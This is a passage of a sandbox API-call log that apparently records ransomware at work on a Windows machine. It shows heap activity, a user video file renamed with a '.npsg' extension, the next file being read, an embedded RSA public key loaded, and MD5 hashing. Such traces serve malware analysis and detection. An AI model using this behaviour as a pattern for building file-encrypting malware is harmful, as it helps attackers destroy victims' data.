hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e38 | out: hHeap=0x620000) returned 1 [0239.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e38 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88df0 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88dd8 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0239.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88df0 | out: hHeap=0x620000) returned 1 [0239.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dd8 | out: hHeap=0x620000) returned 1 [0239.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e38 | out: hHeap=0x620000) returned 1 [0239.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.512] GetCurrentThreadId () returned 0x5b4 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b88638 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.512] GetCurrentThreadId () returned 0x5b4 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0239.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e38 [0239.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88dd8 [0239.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0239.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88df0 [0239.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0239.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88dc0 [0239.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e50 [0239.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e20 [0239.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e08 [0239.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e68 [0239.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e08 | out: hHeap=0x620000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e08 [0239.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e20 | out: hHeap=0x620000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dd8 | out: hHeap=0x620000) returned 1 [0239.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88dd8 [0239.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e38 | out: hHeap=0x620000) returned 1 [0239.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0239.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e68 | out: hHeap=0x620000) returned 1 [0239.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0239.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0239.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dd8 | out: hHeap=0x620000) returned 1 [0239.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e08 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e50 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88df0 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dc0 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d78 | out: hHeap=0x620000) returned 1 [0239.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86a68 | out: hHeap=0x620000) returned 1 [0239.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0239.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0239.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0239.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0239.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.517] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x14557, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x14557, lpOverlapped=0x0) returned 1 [0239.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0239.518] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1455c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.518] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0239.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0239.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0239.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0239.518] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0239.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.518] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.518] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.518] CloseHandle (hObject=0x644) returned 1 [0239.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0239.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b89cd0 [0239.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0239.521] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\OZG4GA.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\ozg4ga.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\OZG4GA.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\ozg4ga.mkv.npsg")) returned 1 [0239.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.522] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.523] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4892e030, ftCreationTime.dwHighDateTime=0x1d5c2fc, ftLastAccessTime.dwLowDateTime=0x1c305250, ftLastAccessTime.dwHighDateTime=0x1d5bce1, ftLastWriteTime.dwLowDateTime=0x1c305250, ftLastWriteTime.dwHighDateTime=0x1d5bce1, nFileSizeHigh=0x0, nFileSizeLow=0x1fce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Qkx8qg7cJ_dn q5b5.flv", cAlternateFileName="QKX8QG~1.FLV")) returned 1 [0239.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0239.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.523] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\Qkx8qg7cJ_dn q5b5.flv") returned=".flv" [0239.523] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\Qkx8qg7cJ_dn q5b5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\qkx8qg7cj_dn q5b5.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.524] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=8142) returned 1 [0239.524] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.527] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1fa8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.527] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.529] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.529] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1fce, lpOverlapped=0x0) returned 1 [0239.530] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.530] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.530] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.530] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.531] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.531] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.531] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.531] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.531] GetLastError () returned 0x0 [0239.531] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.531] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.531] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.531] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.531] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fd0) returned 0x3b89cd0 [0239.532] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.532] 